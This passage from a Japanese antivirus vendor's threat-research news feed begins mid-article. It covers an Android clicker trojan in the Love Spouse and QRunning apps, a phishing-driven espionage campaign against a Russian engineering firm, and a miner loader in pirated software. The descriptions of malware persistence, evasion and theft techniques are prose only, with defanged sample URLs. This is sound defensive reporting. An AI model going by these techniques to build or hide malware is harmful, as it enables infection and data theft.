Windowsを標的としたバージョンと異なり、このトロイの木馬はRSAによって暗号化されています。また、コマンドの実行にbashインタプリタを使用しており、これにより1つのメッセージ内でスクリプト全体を実行することができます。トロイの木馬の各インスタンスには固有の識別子があり、攻撃者は複数のボットを1つのチャットルームに接続してそれらすべてにコマンドを送信することが可能です。

このように、トロイの木馬とコントロールサーバー間の通信方法は目新しいものではありますが、ネットワークトラフィックを注意深く分析することでこの攻撃を検出することが可能です。Telegramサーバーとのデータのやり取りはユーザーのコンピューターでは珍しくないかもしれませんが、ローカルネットワーク内のサーバーではそうではないからです。

感染を防ぐため、ローカルネットワーク内のすべてのノードにアンチウイルスソフトウェアをインストールすることをお勧めします。Windows、macOS、Android、Linux、FreeBSD向けの Dr.Web Security Suite アンチウイルスソリューションは、お客様のビジネスを確実に保護します。さらに、Doctor Webではネットワーク境界のエッジデバイス向けにStream Engineスキャンテクノロジーに基づくソリューションを提供しています。これにより、実質無遅延でトラフィックデータをスキャンして脅威を検出することができます。

Indicators of compromise (侵害の痕跡)※英語

スマートセックストイに潜むクリッカー型トロイの木馬

Sat, 04 May 2024 00:00:00 GMT

2024年5月7日

株式会社Doctor Web Pacific

Doctor Webのウイルスアナリストは、ユーザーの気づかぬうちに広告サイトを開いてページ上でクリックするクリッカー型トロイの木馬の潜んだAndroidアプリケーションを発見しました。このようなトロイの木馬は密かに広告を表示させたり、クリック数を稼いだり、ユーザーを有料サービスに登録したり、 DDoS攻撃を実行したりするために使用されます。

Android向けアンチウイルスDr.Web for Androidには、動作解析に基づいて脅威を検出するテクノロジーOrigins Tracing™が十年以上も前から実装されています。この度、Google Playからダウンロードされたアプリ「Love Spouse」内に潜んだ不審なコンポーネントを検知し、ユーザーのデバイスを感染から守ったのがこのOrigins Tracing™でした。「Love Spouse」アプリはアダルトグッズをコントロールするためのものですが、標準デバッグコンポーネントcom.android.logcatchライブラリに偽装したクリッカー型トロイの木馬 Android.Click.414.origin が含まれていました。このトロイの木馬は「Love Spouse」のほかに、身体活動を追跡するアプリ「QRunning」でも検出されています。いずれも中国企業によって開発されたもので、合計で150万台を超えるデバイスにインストールされている極めて人気のあるアプリです。悪意のあるコードは最近、すなわちアプリの最新の数バージョン前から組み込まれ始めたものとみられます。現在、「Love Spouse」はバージョン1.8.8にアップデートされており、このバージョンにはトロイの木馬は含まれていません。一方、「QRunning」の修正アップデートは未だリリースされていない状況です。

アプリ「Love Spouse」と「QRunning」

このマルウェアは昨年4月に検出されたトロイの木馬 Android.Click.410.origin の亜種です。TVボックス「V88mini」のシステムパーティションでアンチウイルスによって新しいファイルが検出されたというユーザーからの連絡がDoctor Webのウイルスラボに寄せられ、それがダウンローダー Android.Click.410.origin でした。どのように感染が起こったのかについて確実な情報は得られませんでしたが、このデバイスにインストールされていたOSは主張されていたものとは異なるものであったという点が目を引きます。製品カードとシステム情報ページには、このTVボックスにはAndroid 12が搭載されていると記載されていましたが、OSビルド固有の識別子であるビルドIDはAndroid 7のものでした。残念ながら、低価格帯のAndroid TVボックスではこのようなケースが珍しくありません。それを証明するかのように、続けて別のユーザーからも問い合わせがあり、TVボックス「X96Q」で同じトロイの木馬 Android.Click.410.origin とOSスプーフィング手法が確認されました。このケースでは、トロイの木馬はアプリ「Desk Clock」に組み込まれていました。

トロイの木馬が検出されたTVボックス。これらのデバイスがいかに大きな脅威となりうるかについてはこちらの記事をご覧ください。

詳細な分析の結果、このトロイの木馬はモジュラー型構造であることが明らかになりました。モジュールの1つはデバイスに関する情報を収集し、残り2つのモジュールは密かにWebページを開き、広告を表示させてクリックを実行します。このトロイの木馬はホストアプリケーションが制御された環境で実行されていることを検知することもできます。エミュレーション環境であることを示すサインを検知した場合は、広告を表示させるタスクを送信しないようC2サーバーに指示します。また、特定のユーザーは標的から外れており、インターフェース言語が中国語に設定されているデバイス上では起動されることすらないという点も特徴的です。

起動された場合、このトロイの木馬はデバイスに関する極めて詳細な情報(ブランド、モデル、OSバージョン、IPアドレス、設定で選択された地域、キャリアコードなど)をC2サーバーに送信します。次に、組み込まれた2つの戦略のうち1つをアクティベートしますが、そのタスクの一部として、Android OSに含まれるWebViewコンポーネントを使用して密かにWebサイトを開きます。このコンポーネントはブラウザを起動せずにWebページを開くことを可能にするものです。このトロイの木馬はWebページをスクロールしたり、フォームにテキストを入力したり、開いたサイトで音声や動画ファイルが再生されている場合に音声をミュートにしたりすることができます。これらのアクションを実行するために、目的の広告ページが開かれているWebView内でC2サーバーから受け取ったJavaScriptコードを実行します。また、表示されているページのスクリーンショットを撮影してサーバーに送信し、ピクセル単位で分析してクリック可能な領域を特定することもできます。そのほか、また別のタスクとして、Bing、Yahoo、Google検索エンジンを使用してキーワードに基づいて広告リンクを提示します。

当初、このトロイの木馬は非公式Androidアプリストアで入手可能なアプリ内で検出されていましたが、2024年2月に公式ストアのGoogle Playにも侵入を果たしています。「Love Spouse」のバージョン1.8.1には未だトロイの木馬は含まれておらず、それよりも後にリリースされたバージョンのどこかで侵害された可能性が高いとみられます。

Doctor Webのユーザーからアプリにトロイの木馬が含まれていると知らされて驚く「Love Spouse」の販売元。「信頼性の高いアンチウイルス」を使用するよう勧めています。

お使いのデバイスにソフトウェアをインストールする際は十分に注意するようにしてください。Dr.Web Security Space for AndroidはAndroid.Clickトロイの木馬を検出・駆除し、デバイスをマルウェアから保護します。

Indicators of compromise(侵害の痕跡)※英語

ロシアの機械工学系企業を狙った標的型攻撃に関する調査レポート

Tue, 12 Mar 2024 11:22:49 GMT

Download PDF

2024年3月12日

株式会社Doctor Web Pacific

序論

2023年10月、Doctor Webはロシアの機械工学系企業の1社から、コンピューターの1台にマルウェアが存在する疑いがあるという連絡を受けました。Doctor Webのスペシャリストによるインシデント調査の結果、この企業が標的型攻撃を受けていたということが明らかになりました。企業に対してフィッシングメールが送信されており、その添付ファイルに潜んだ悪意のあるプログラムがシステムを感染させ、別の悪意のあるツールをそのシステム上にインストールしていたというものです。

この攻撃の目的は、従業員に関する機密情報を取得し、企業のインフラストラクチャと内部ネットワークに関するデータを収集することでした。また、感染したコンピューターからデータがアップロードされていたという事実も確認されています。このデータにはコンピューター上に保存されていたファイルや、マルウェアの動作中に撮影されたスクリーンショットが含まれていました。

攻撃およびツールに関する情報

2023年10月の初め、悪意のあるアクターにより同企業のアドレス宛てに複数のフィッシングメールが送信されました。これらのメールはロシア連邦捜査委員会の調査官を装って送信されており、件名は脱税事件の「捜査」に関するものとなっています。メールには２つの添付ファイルが含まれていました。１つ目はパスワード保護されたZIPアーカイブで、実行されるとシステムの感染プロセスを開始する悪意のあるプログラムが隠されていました。２つ目はPDFドキュメントで、このファイル自体は悪意のあるものではありませんでしたが、「刑事事件」に関する情報はすべてアーカイブ内にあると記載されたフィッシングテキストが含まれており、アーカイブから悪意のあるプログラムを開くようユーザーを誘導する役割を担っていました。

最初に送られたフィッシングメールにはZIPアーカイブТрeбoвaниe 19098 Cлед ком РФ от 02.10.23 ПАРОЛЬ - 123123123.zipが添付されており、トロイの木馬アプリはそこに含まれるПеречень юридических лиц и предприятий, уклонение от уплаты налогов, требования и дополнительные.exeファイル内に隠されていました。

最後に送られたフィッシングメールの1つは以下のようなものでした。

このメールにはフィッシングPDFドキュメントТребование следователя, уклонение от уплаты налогов (запрос в рамках УД).pdfとZIPアーカイブТрeбoвaниe 19221 СК РФ от 11.10.2023 ПАРОЛЬ - 123123123.zipが添付されており、アーカイブには以下のコンテンツが格納されていました。

先のメールと同様、アーカイブからファイルを抽出するためのパスワード（123123123）が、アーカイブの名前とドキュメントПароль для открытия 123123123.odtの名前に含まれています。このドキュメントと、Права и обязанности и процедура ст. 164, 170, 183 УПК РФ.pdfおよびСК РФ.pngファイルは、それ自体悪意のあるものではありません。

このアーカイブにはトロイの木馬アプリケーションの2つのコピー（Перечень предприятий, уклонение от уплаты налогов, а также дополнительные материалы.exeおよびДополнительные материалы, перечень вопросов, накладные и первичные документы.exe）が含まれていました。

いずれのケースでも、アーカイブに隠されていた悪意のあるプログラムは Trojan.Siggen21.39882 でした。WhiteSnake Stealerとしても知られるこのマルウェアはDarkNetで売買され、さまざまなソフトウェアからアカウントデータやその他のデータを盗む目的で使用されています。また、標的となるコンピューターに別の悪意のあるアプリをダウンロードしてインストールすることもできます。今回の標的型攻撃では、感染の第一段階を担っていました。該当するコマンドを受け取った後、このトロイの木馬は感染したシステムのWi-Fiネットワークプロファイル構成に関する情報とそれにアクセスするためのパスワードを収集し、攻撃者に送信します。次に、SSHプロキシサーバーを起動させ、感染の第二段階を担う悪意のあるプログラムをシステムにインストールします。

感染の第二段階を担うと同時に悪意のあるアクターのメインツールでもあるのが悪意のあるバックドアプログラム JS.BackDoor.60 です。このツールを介して攻撃者と感染したシステム間の主なやりとりが実行されます。 JS.BackDoor.60 の特徴の1つは独自のJavaScriptフレームワークを使用しているという点です。このトロイの木馬は難読化されたメインの本体と追加モジュールで構成されています。 JS.BackDoor.60 のアーキテクチャが持つ特性上、これらのモジュールは同時にトロイの木馬のコンポーネントでもあり、共通のJavaScript関数を介して実行されるタスクでもあります。新たなタスクはC&Cサーバーからトロイの木馬に送信されます。これにより、このトロイの木馬は実質的に機能拡張可能なマルチコンポーネント脅威となり、強力なサイバースパイツールとして使用することが可能になります。

JS.BackDoor.60 が自身を自動実行させるために使用するメカニズムも特徴的です。Windowsレジストリに必要な変更を加えるという従来の手法に加えて、このトロイの木馬はショートカットファイル（.lnk）を特定の方法で改変します。まず、デスクトップやタスクバーのディレクトリを含む、複数のシステムディレクトリのコンテンツをチェックし、見つかったすべてのショートカットファイル（Explorer.lnkとПроводник.lnkを除く）に対し、wscript.exeプログラムを起動対象アプリとして設定します。同時に、起動のための特別な引数を追加します。そのうちの1つはバックドア本体が書き込まれる代替データストリーム（ADS）でした。これらの変更の結果、改変されたショートカットはまず初めに JS.BackDoor.60 を起動し、その後にのみ元のプログラムを起動させるようになります。

攻撃が行われている間、悪意のあるアクターはさまざまなコマンドを次々とバックドアに送信することで、感染したコンピューターから何十ものディレクトリのコンテンツ（個人と企業の両方のデータを含む）を盗みとっていました。また、トロイの木馬によってスクリーンショットが撮影されていた証拠も確認されています。

この攻撃では、追加のスパイツールとして悪意のあるプログラムBackDoor.SpyBotNET.79が使用されていました。このトロイの木馬は、感染したコンピューターに接続されたマイクを通じて周囲の音声を盗聴したり会話を録音したりするためのもので、特定の強さの音、特に人の声であることを示す強さの音を検知した場合にのみ録音を実行します。

同時に、攻撃者はシステムをダウンローダ型トロイの木馬Trojan.DownLoader46.24755にも感染させようとしていますが、発生したエラーにより失敗しています。

以下の図は攻撃の進行を時系列で示したものです。

次の図は JS.BackDoor.60 が受けとったタスクを時系列で示したものです。

Doctor Webのスペシャリストによる分析の結果からは、今回の攻撃にこれまでに知られているAPTグループが関与しているという明確な証拠は示されませんでした。

検出された悪意のあるプログラムの詳細な技術的情報については、調査レポートのPDFバージョンまたはDoctor Webウイルスライブラリを参照してください。

Trojan.Siggen21.39882の詳細 ※英語

JS.BackDoor.60の詳細 ※英語

BackDoor.SpyBotNET.79の詳細 ※英語

Trojan.DownLoader46.24755の詳細 ※英語

結論

Trojan.Siggen21.39882 のような、商用サービス（MaaS — Malware as a Service）として入手可能な悪意のあるツールを使用することで、比較的経験の浅い悪意のあるアクターでも企業や政府機関に対する極めて機密性の高い情報を狙った攻撃を行うことが可能になります。また、ソーシャルエンジニアリングは依然として深刻な脅威となっています。これは幾重ものビルトインセキュリティをすり抜けるための比較的シンプルながら効果的な手法であり、熟練したサイバー犯罪者でも新米のサイバー犯罪でも使用することができます。これらを踏まえると、ワークステーションやメールゲートウェイを含む企業インフラストラクチャ全体を確実に保護することがとりわけ重要となってきます。また、従業員に対して情報セキュリティに関する定期的なトレーニングを実施し、最新のサイバー脅威についてしっかりと理解してもらうことが推奨されます。これらの対策を講じることで、サイバーインシデントが発生するリスクを軽減し、攻撃による被害を最小限に食い止めることができます。

Indicators of compromise

海賊版ソフトウェアに潜みサイバー犯罪者に利益をもたらす仮想通貨マイナー

Tue, 16 Jan 2024 10:15:29 GMT

2024年1月16日

株式会社Doctor Web Pacific

Doctor Webは、Telegramや複数のサイトから入手可能な海賊版ソフトウェアに仮想通貨をマイニングするトロイの木馬が潜んでおり、その検出数が増加していることを確認しました。

2023年12月、海賊版ソフトウェアに潜んでユーザーのコンピューターに侵入するトロイの木馬 Trojan.BtcMine.3767 と Trojan.BtcMine.2742 （ Trojan.BtcMine.3767 によって挿入されるペイロード）の検出数が増加していることが、Doctor Webのウイルスアナリストによって確認されました。

Trojan.BtcMine.3767 はC++で書かれた、Windows向けのトロイの木馬プログラムです。仮想通貨マイナーをダウンロードするローダーで、SilentCryptoMinerプロジェクトをベースにしています。感染したソフトウェアパッケージの拡散にはTelegramチャンネル「t[.]me/files_f」（登録者数5,000人以上）とWebサイト「itmen[.]software」、「soft[.]sibnet[.]ru」が使用されています。後者のケースでは、ハッカーはひと手間かけてNSISインストーラを使用したカスタムビルドを用意しているというのが興味深い点です。インストールパッケージの解凍後、Doctor Webのアナリストは攻撃者がトロイの木馬のソースファイルを保存するために使用していたパスを特定しました。

C:\bot_sibnet\Resources\softportal\exe\
C:\bot_sibnet\Resources\protect_build\miner\

Doctor Webのマルウェア解析ラボによると、このトロイの木馬の拡散キャンペーンの1つでは、わずか2か月足らずの間に4万台を超えるコンピューターが感染しています。Telegramの閲覧数やWebサイトのトラフィックを踏まえると、実際の規模はより一層大きなものである可能性があります。

起動されると、ローダーは %ProgramFiles%\google\chrome\ ディレクトリに updater.exe という名前で自身をコピーし、OSの起動時に自動実行されるようスケジューラタスクを作成します。無害に見えるよう、タスクには GoogleUpdateTaskMachineQC という名前が付いています。さらに、ローダーは自身のファイルをWindows Defenderの除外に追加し、また、コンピューターがシャットダウンしたり休止状態になったりするのを防ぎます。初期設定はトロイの木馬に埋め込まれており、リモートホストから更新されます。初期化されると、ローダーは仮想通貨を密かにマイニングするペイロードである Trojan.BtcMine.2742 を explorer.exe プロセスに挿入します。

また、このローダーによって、感染したコンピューター上にファイルレスルートキットr77をインストールしたり、Windowsのアップデートを無効にしたり、Webサイトへのアクセスをブロックしたり、トロイの木馬のソースファイルを自動的に削除または復元したり、仮想通貨のマイニングプロセスを一時停止したり、ユーザーがプロセス監視プログラムを起動した場合にマイナーが使用するRAMとVRAMをアンロードしたりすることも可能です。

Dr.Webアンチウイルス製品は Trojan.BtcMine.3767 および Trojan.BtcMine.2742 を検出し駆除します。そのため、Dr.Webユーザーに危害が及ぶことはありません。

Indicators of compromise(侵害の痕跡) ※英語